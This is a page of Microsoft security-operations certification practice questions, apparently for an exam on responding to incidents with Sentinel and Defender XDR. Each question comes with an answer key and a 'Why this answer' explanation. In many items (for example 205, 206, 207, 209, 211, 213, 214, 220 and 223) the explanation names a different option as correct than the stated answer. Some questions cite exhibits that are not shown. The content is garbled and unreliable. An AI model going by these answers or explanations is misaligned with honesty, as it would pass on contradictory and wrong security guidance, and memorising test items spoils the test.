Identifies the malicious email and affected user.

Why this answer

Options A and D are correct. A: Running a KQL query on EmailEvents identifies the email and user. D: Checking Microsoft Defender for Office 365 shows the threat status.

Option B is wrong because the analyst should not delete the email yet (investigation first). Option C is wrong because resetting password is premature without evidence of compromise.

200
MCQmedium

Your Microsoft Sentinel workspace receives logs from multiple sources. You need to ensure that an incident response playbook is triggered automatically when a specific alert is generated. What should you create?

A.A data connector.
B.An analytics rule.
C.An automation rule.
D.A new Logic App.
AnswerC

Automation rules can trigger playbooks on alert creation.

Why this answer

Option C is correct because an automation rule in Microsoft Sentinel can trigger a playbook when an alert is created. Option A is wrong because a logic app is the playbook itself, not the trigger. Option B is wrong because a data connector ingests data, not triggers actions.

Option D is wrong because an analytics rule generates alerts, but the playbook trigger is an automation rule.

201
MCQeasy

Refer to the exhibit. An automation rule is created in Microsoft Sentinel. A new incident is created with severity 'Medium' and two alerts: one 'High' and one 'Medium'. Will the playbook run?

A.No, because the incident severity is Medium.
B.Yes, because the incident contains a High severity alert.
C.Yes, because the playbook runs on all incidents regardless.
D.No, because the condition requires all alerts to be High.
AnswerB

The incident severity is determined by the highest alert severity, so it is High, meeting the condition.

Why this answer

The condition checks 'AlertSeverity', but an incident can have multiple alerts with different severities. The condition evaluates the incident's overall severity, which is set to the highest alert severity. Since there is a High alert, the incident severity becomes High, so condition is met.

202
MCQmedium

Your organization uses Microsoft Sentinel. A security analyst receives an alert from a custom analytics rule that triggers on a specific sequence of failed logon attempts followed by a successful logon from an unusual location. The incident is generated but the analyst is not sure if the activity is malicious or a user error. What should the analyst do first to quickly gather additional context?

A.Run a KQL query across the entire workspace to find all related events
B.Create a new analytics rule to detect similar patterns
C.Use the Investigation graph to explore related entities and events
D.Modify the existing analytics rule to add more conditions
AnswerC

The Investigation graph provides a visual, entity-based approach to quickly understand incident context.

Why this answer

Option C is correct because using the Investigation graph in Microsoft Sentinel allows the analyst to visually explore related entities and events to understand the scope and context of the incident. Option A is wrong because creating a new analytics rule would not help with immediate investigation. Option B is wrong because running a KQL query across the entire workspace is time-consuming and less efficient.

Option D is wrong because modifying the existing rule is not appropriate for investigating a single incident.

203
MCQmedium

Refer to the exhibit. A security analyst runs this PowerShell script to query a Log Analytics workspace. What is the purpose of this query?

A.Count the number of unique devices
B.Identify all PowerShell executions in the last 7 days
C.List all processes run by a specific account
D.Detect suspicious PowerShell activity using encoded commands
E.Find devices that have not run PowerShell recently
AnswerD

The query specifically looks for '-EncodedCommand'.

Why this answer

The query hunts for PowerShell executions with encoded commands, a common technique for obfuscation. It is not limited to specific users, recent activity, or only encoded commands without other criteria.

204
Multi-Selectmedium

Which TWO actions are appropriate when responding to a confirmed malware outbreak on multiple workstations identified by Microsoft Defender for Endpoint?

Select 2 answers
A.Collect investigation packages from the affected devices for analysis.
B.Add the malware hash to the custom threat indicator list.
C.Run a full antivirus scan on all workstations.
D.Reset passwords of all users who logged into the affected devices.
E.Isolate the affected devices from the network using Microsoft Defender for Endpoint.
AnswersA, E

Investigation packages provide forensic data to understand the scope and impact.

Why this answer

Collecting investigation packages and isolating affected devices are appropriate response actions. Running a full scan is reactive and not immediate. Resetting passwords may be needed later but not first.

Blocking indicators is proactive but doesn't contain already infected devices.

205
MCQhard

Refer to the exhibit. You are creating an automation rule in Microsoft Sentinel to trigger a playbook when an alert is created. However, the playbook does not run. What is the most likely cause?

A.The JSON syntax is invalid.
B.The playbook's resource ID is incorrect.
C.The automation rule lacks permissions to the playbook.
D.The displayName is not unique.
AnswerB

An incorrect resource ID prevents the automation rule from finding the playbook.

Why this answer

Option A is correct because the `logicAppResourceId` might be incorrect or the playbook might not be accessible. Option B is wrong because the rule name is irrelevant. Option C is wrong because there is no permission issue indicated.

Option D is wrong because the JSON is valid.

206
MCQeasy

Your organization uses Microsoft Sentinel. A security analyst reports a high number of false positives from a scheduled analytics rule that detects anomalous sign-ins. The rule uses the 'UserAgent' field in the SigninLogs table. What is the best practice to reduce false positives while maintaining detection coverage?

A.Increase the alert threshold to require more than one anomalous sign-in per hour.
B.Create a watchlist of legitimate IP addresses and reference it in the rule.
C.Disable the analytics rule and create a new one with different MITRE tactics.
D.Add a condition to the rule query to filter out known legitimate user agents.
AnswerD

Filtering out known legitimate user agents reduces false positives while maintaining detection.

Why this answer

Option B is correct because adding a filter to exclude known legitimate user agents reduces noise without removing the rule. Option A is wrong because disabling the rule removes coverage. Option C is wrong because creating a watchlist is useful but does not directly reduce false positives from the rule.

Option D is wrong because increasing the threshold may miss real attacks.

207
MCQhard

Refer to the exhibit. A security analyst runs this KQL query in Microsoft Defender XDR advanced hunting. What is the most likely purpose of this query?

A.To find accounts with failed logon attempts indicating brute force
B.To find devices that made outbound network connections to known malicious IPs
C.To identify accounts or devices with high volumes of suspicious PowerShell activity
D.To detect persistence mechanisms like scheduled tasks
AnswerC

The query focuses on PowerShell with encoding/switches and high counts.

Why this answer

Option B is correct because the query filters for PowerShell executions with encoded or command-line switches and groups by device and account, looking for devices/accounts with more than 5 such executions in the last 7 days. This is typical for detecting excessive use of PowerShell for suspicious activity. Option A is wrong because the query does not check for network connections.

Option C is wrong because the query counts executions, not persistence mechanisms. Option D is wrong because the query is not about weak credentials.

208
Multi-Selecteasy

Which TWO options are valid ways to create an incident in Microsoft Sentinel?

Select 2 answers
A.By creating a workbook
B.From an alert generated by an analytics rule
C.By importing data from a watchlist
D.By running a hunting query
E.By synchronizing incidents from Microsoft Defender XDR
AnswersB, E

Analytics rules create alerts that are grouped into incidents.

Why this answer

Options A and B are correct. Analytics rules generate alerts that become incidents, and Microsoft Defender XDR incidents are synchronized. Option C is wrong because workbooks are read-only.

Option D is wrong because watchlists are for enrichment. Option E is wrong because hunting queries require manual creation of incidents.

209
MCQhard

Your company uses Microsoft Defender for Endpoint (MDE) on all Windows 10 devices. You are investigating a machine that is suspected of being part of a botnet. The machine is communicating with a known C2 server at IP 203.0.113.55. You have confirmed that the IP is malicious. You need to block all outbound traffic from the machine to that IP immediately, and also ensure that no other devices in the organization can communicate with that IP. The solution must be implemented without deploying additional network appliances. What should you do?

A.Create a network protection policy in Microsoft Intune to block the IP
B.Create a custom network indicator in Microsoft Defender for Endpoint with action 'Alert and block'
C.Use the Microsoft Defender for Endpoint portal to block the IP globally
D.Create a firewall rule in Windows Defender Firewall to block outbound traffic to the IP, and deploy via Group Policy
AnswerB

Custom network indicators allow blocking IPs across all MDE devices.

Why this answer

Option B is correct because custom network indicators in MDE can block IPs at the device level, and the action applies to all MDE-enrolled devices. Option A is wrong because MDE network protection does not support custom IP blocking via policy. Option C is wrong because Windows Defender Firewall rules would need to be deployed via GPO or Intune, which is slower and more complex.

Option D is wrong because the MDE portal does not have a global IP blocklist feature.

210
Multi-Selecthard

Which TWO indicators of compromise (IOCs) are most likely to be included in a Microsoft Sentinel threat intelligence feed to detect a known malware campaign?

Select 2 answers
A.Domain name
B.File hash (SHA-256)
C.Email address
D.Registry key
E.IP address
AnswersB, E

File hashes are widely used to identify malware samples.

Why this answer

Correct answers are A and E. File hashes and IP addresses are common IOCs used in threat intelligence feeds. Domain names and email addresses are also used but less common for malware detection.

Registry keys are not typical IOCs in feeds.

211
Multi-Selectmedium

Your organization uses Microsoft 365 Defender. You are investigating a potential malware outbreak on several endpoints. Which TWO actions should you take to isolate affected devices and prevent lateral movement?

Select 2 answers
A.Use Microsoft Defender for Endpoint to initiate device isolation on affected devices.
B.Run a full antivirus scan on all endpoints.
C.Reset the passwords of all users on the affected devices.
D.Delete the user accounts that logged into the affected devices.
E.Block the file hash of the malware in Microsoft Defender for Endpoint indicators.
AnswersA, E

Isolation stops network communication, preventing lateral spread.

Why this answer

Options B and D are correct. Isolating devices from the network (B) prevents communication with other devices, and blocking the malicious file hash (D) prevents execution on other endpoints. Option A is wrong because resetting passwords does not stop lateral movement.

Option C is wrong because running a full scan takes time and does not immediately isolate. Option E is wrong because deleting user accounts is too drastic and not focused on lateral movement.

212
Multi-Selectmedium

Which THREE indicators of compromise (IOCs) are commonly used in Microsoft Sentinel to detect advanced persistent threats (APTs)? (Choose THREE.)

Select 3 answers
A.Suspicious domains and URLs.
B.Vulnerability scan results.
C.File hashes (SHA256) of known malware.
D.Windows event IDs for successful logins.
E.IP addresses of known command and control servers.
AnswersA, C, E

Domains and URLs are common IOCs.

Why this answer

Option A, B, and D are common IOCs. Option C is not an IOC, it's a security product. Option E is not typically used as an IOC.

213
MCQhard

Your organization has a hybrid identity environment with Microsoft Entra ID (Azure AD) and on-premises Active Directory. You are using Microsoft Defender for Identity (MDI) integrated with Microsoft Defender XDR. An incident is raised indicating that a user account has been compromised because of an anomaly in Kerberos protocol activity. The incident severity is High. You need to contain the incident immediately by disabling the user account across both on-premises and cloud. However, you also want to preserve the account for forensic analysis. What is the recommended course of action?

A.Delete the user account from Microsoft Entra ID and on-premises AD immediately.
B.Reset the user's password in Microsoft Entra ID and force a password change at next logon on-premises.
C.Enable conditional access policy to require MFA for the user and revoke all refresh tokens.
D.From Microsoft Defender XDR incident, use the action to disable the user account in Microsoft Entra ID and also disable the on-premises account using a playbook that runs a PowerShell script.
AnswerD

Disabling the account stops access and preserves the account for forensics.

Why this answer

To contain the incident, you can disable the account in Microsoft Entra ID and on-premises AD. However, to preserve the account for forensics, you should disable it rather than delete it. Option A is correct because disabling the account in both locations stops access while preserving the account.

Option B is wrong because resetting password alone does not prevent Kerberos abuse if the account is already compromised. Option C is wrong because requiring MFA does not block on-premises authentication. Option D is wrong because deleting the account would lose forensic evidence.

214
MCQmedium

You are investigating a potential ransomware incident in Microsoft Defender XDR. The incident has a high severity alert indicating that a user installed a suspicious application. Which initial response action should you take to contain the threat while preserving evidence?

A.Isolate the device using Microsoft Defender for Endpoint.
B.Reset the user's password and enforce MFA.
C.Uninstall the suspicious application via Intune.
D.Disable the user account in Microsoft Entra ID.
AnswerA

Isolation stops communication and contains the threat while preserving evidence.

Why this answer

Option B is correct because isolating the device from the network immediately stops lateral movement and data exfiltration while preserving forensic data. Option A is wrong because disabling the user account does not stop the malware from running. Option C is wrong because deleting the application may remove evidence.

Option D is wrong because resetting the password does not contain the threat.

215
MCQhard

Your organization uses Microsoft Sentinel and Microsoft Defender for Cloud. You receive an alert from Defender for Cloud that a virtual machine has a high severity vulnerability: 'CVE-2023-XXXX' with a CVSS score of 9.8. The virtual machine is running a critical application for the finance department. You need to remediate the vulnerability as quickly as possible while minimizing downtime. The application vendor has not yet released a patch but has provided a workaround. What should you do?

A.Dismiss the alert as a false positive because no patch is available.
B.Shut down the virtual machine until a patch is available.
C.Implement the workaround provided by the vendor and create a custom remediation task in Defender for Cloud to track the issue.
D.Apply a network security group to block all inbound traffic to the VM.
AnswerC

Workaround reduces risk while minimizing downtime.

Why this answer

Option C is correct because applying the vendor-provided workaround reduces the risk while waiting for a patch. Option A is wrong because shutting down the VM causes downtime. Option B is wrong because network isolation may not be sufficient.

Option D is wrong because ignoring the alert is not acceptable.

216
MCQhard

Refer to the exhibit. You are investigating incidents related to suspicious process injection. The KQL query above is run in Microsoft Sentinel. What is the purpose of this query?

A.To find alerts that occurred within a specific time range
B.To list all alerts of type 'Suspicious process injection' in the last 7 days
C.To get a count of 'Suspicious process injection' alerts grouped by compromised entity and severity, sorted by count
D.To identify the compromised entities with the highest severity alerts
AnswerC

This matches the query logic.

Why this answer

The correct answer is C because the query summarizes alerts by compromised entity and severity, then orders by count. Option A is wrong because it does not show all alerts. Option B is wrong because it does not filter by time.

Option D is wrong because it does not list all entities.

217
MCQeasy

You are investigating an incident where a user reported receiving a suspicious email with an attachment. The attachment is a .docm file that contains macros. The email was not blocked by Exchange Online Protection. You need to ensure that similar emails are blocked in the future. What should you configure?

A.Create a Safe Links policy to block links in the email.
B.Create a Safe Attachments policy that blocks .docm files.
C.Create an anti-phishing policy to block the sender's domain.
D.Create a transport rule to block emails with .docm attachments.
AnswerB

Safe Attachments detonates attachments in a sandbox and blocks malicious content.

Why this answer

Option A is correct because a Safe Attachments policy in Microsoft Defender for Office 365 will scan attachments and block malicious ones. Option B is wrong because Safe Links scans URLs, not attachments. Option C is wrong because anti-phishing policies protect against impersonation, not malicious attachments.

Option D is wrong because anti-malware policies in Exchange Online Protection are basic and may not detect macro-based malware effectively.

218
Multi-Selecthard

Your organization uses Microsoft Defender XDR. A security incident involving a compromised user account has been identified. Which THREE actions should you take to contain and remediate the incident?

Select 3 answers
A.Disable the user account in Microsoft Entra ID.
B.Reset the user's password.
C.Block all IP addresses that the user has connected from.
D.Revoke all active sessions and tokens for the user.
E.Restore the user's mailbox from a backup.
AnswersA, B, D

Disabling the account stops further access.

Why this answer

Disabling the user account prevents further access. Resetting the password ensures the attacker cannot use the old credentials. Revoking sessions forces termination of active sessions.

Option A is incorrect because blocking all IPs is too broad and may affect legitimate users. Option D is incorrect because restoring from backup is not immediate and may not address the root cause.

219
MCQmedium

Your organization uses Microsoft Sentinel. A security analyst reports that an incident was automatically closed without investigation. You need to identify why the incident was closed automatically. Which Sentinel feature should you review?

A.Analytics rules
B.Automation rules
C.Playbooks
D.Workbooks
E.Watchlists
AnswerB

Automation rules can automatically close incidents based on conditions such as severity or title.

Why this answer

Automation rules can be configured to automatically close incidents based on conditions. Playbooks require manual triggering or automation rules. Analytics rules create incidents, not close them.

Workbooks and watchlists do not close incidents.

220
MCQhard

Your organization uses Microsoft Defender for Cloud Apps. A security analyst discovers that a user's account has been compromised and is exfiltrating sensitive data from SharePoint Online. The analyst needs to immediately block the suspicious activities while allowing legitimate user activities to continue. What should the analyst do?

A.Reset the user's password and require MFA
B.Suspend the user from Defender for Cloud Apps
C.Revoke all OAuth tokens for the user
D.Block the user's IP address in the firewall
AnswerB

Suspending the user immediately blocks access to all cloud apps.

Why this answer

Option C is correct because the 'Suspend user' action in Defender for Cloud Apps immediately blocks the user's access to cloud apps, stopping exfiltration. Option A is wrong because revoking all OAuth tokens might affect other apps and is less targeted. Option B is wrong because changing the password does not immediately stop active sessions.

Option D is wrong because blocking the IP address may affect other users if the IP is shared.

221
MCQmedium

Your organization uses Microsoft Defender for Cloud to assess the security posture of Azure subscriptions. You receive an alert that a critical vulnerability exists on a virtual machine. What is the BEST immediate action to validate the alert and contain the threat?

A.Contact Microsoft support to request a vulnerability assessment.
B.Immediately apply the latest security patches to the VM using Azure Update Manager.
C.Isolate the VM from the network by applying a network security group rule.
D.Review the alert details in Microsoft Defender for Cloud to identify the vulnerability and follow the remediation steps.
AnswerD

Alert details provide actionable information for validation and remediation.

Why this answer

Option A is correct because the alert includes affected resources and remediation steps. Option B is wrong because applying a patch without validation may cause downtime. Option C is wrong because isolating the VM from the network is a containment step but not validation.

Option D is wrong because contacting support is not immediate action.

222
MCQeasy

Your SOC uses Microsoft Defender for Cloud Apps. An alert indicates that a user is downloading a large number of files from SharePoint. Which action should you take to investigate and potentially block the activity?

A.Create a Conditional Access policy to block the user
B.Block the IP address in Azure Firewall
C.Use Microsoft Intune to wipe the user's device
D.Suspend the user in Defender for Cloud Apps
AnswerD

Governance actions like suspend immediately stop the activity.

Why this answer

Option D is correct because Defender for Cloud Apps allows you to govern the user by suspending them or blocking the app. Option A is wrong because Azure AD Conditional Access policies are applied at authentication, not during active session. Option B is wrong because Intune manages devices, not user access to cloud apps.

Option C is wrong because blocking the IP may affect other users.

223
MCQhard

Your organization uses Microsoft Sentinel and Microsoft Defender for Identity. An alert fires for a potential DCSync attack. The incident response team needs to immediately block the source account from performing directory replication. Which action should be taken?

A.Use Microsoft Defender for Identity to disable the account.
B.Reset the account password and enforce a sign-out.
C.Disable the account in Microsoft Entra ID (if synced) or Active Directory.
D.Remove the account from the Domain Admins group.
AnswerC

Disabling the account immediately revokes access and prevents further authentication.

Why this answer

Option D is correct because disabling the account in Microsoft Entra ID (formerly Azure AD) is the quickest way to stop the account from performing any actions, including DCSync. Option A is wrong because removing from Domain Admins does not remove the 'Replicate Directory Changes' permission if it was delegated. Option B is wrong because resetting the password does not terminate existing sessions immediately.

Option C is wrong because the Microsoft Defender for Identity alert provides details but does not directly block the account.

224
Multi-Selectmedium

Which TWO actions can be performed using Microsoft Sentinel's automation rules? (Choose two.)

Select 2 answers
A.Block an IP address in Azure Firewall.
B.Change the severity of an incident.
C.Assign a user to an incident owner.
D.Trigger a playbook.
E.Run a KQL query against a Log Analytics workspace.
AnswersB, D

Automation rules can modify incident properties including severity.

Why this answer

Option A and D are correct. Automation rules can trigger playbooks and change incident severity. Option B is wrong because automation rules cannot directly block IP addresses; that requires a playbook.

Option C is wrong because automation rules run on incidents, not on queries. Option E is wrong because automation rules do not manage user permissions.

225
Multi-Selecteasy

A security analyst detects a suspicious login from an unusual location for a user in Microsoft Defender XDR. The analyst needs to investigate and contain the incident. Which TWO actions should be taken?

Select 2 answers
A.Disable the user account from Microsoft Entra ID.
B.Create a custom hunting query in Microsoft 365 Defender advanced hunting.
C.Review the user's sign-in logs and risk level in Microsoft Entra ID Identity Protection.
D.Run an automated investigation playbook.
E.Reset the user's password.
AnswersA, C

Disabling the account immediately stops further access.

Why this answer

Disabling the user account (B) immediately stops further access. Using Microsoft Entra ID Identity Protection to confirm risk (C) provides additional context. Investigation playbooks (A) are for automation not immediate containment.

Resetting password (D) is less immediate than disabling. Hunting queries (E) are for proactive threat hunting.

← PreviousPage 3 of 7 · 489 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Respond Security Incidents questions.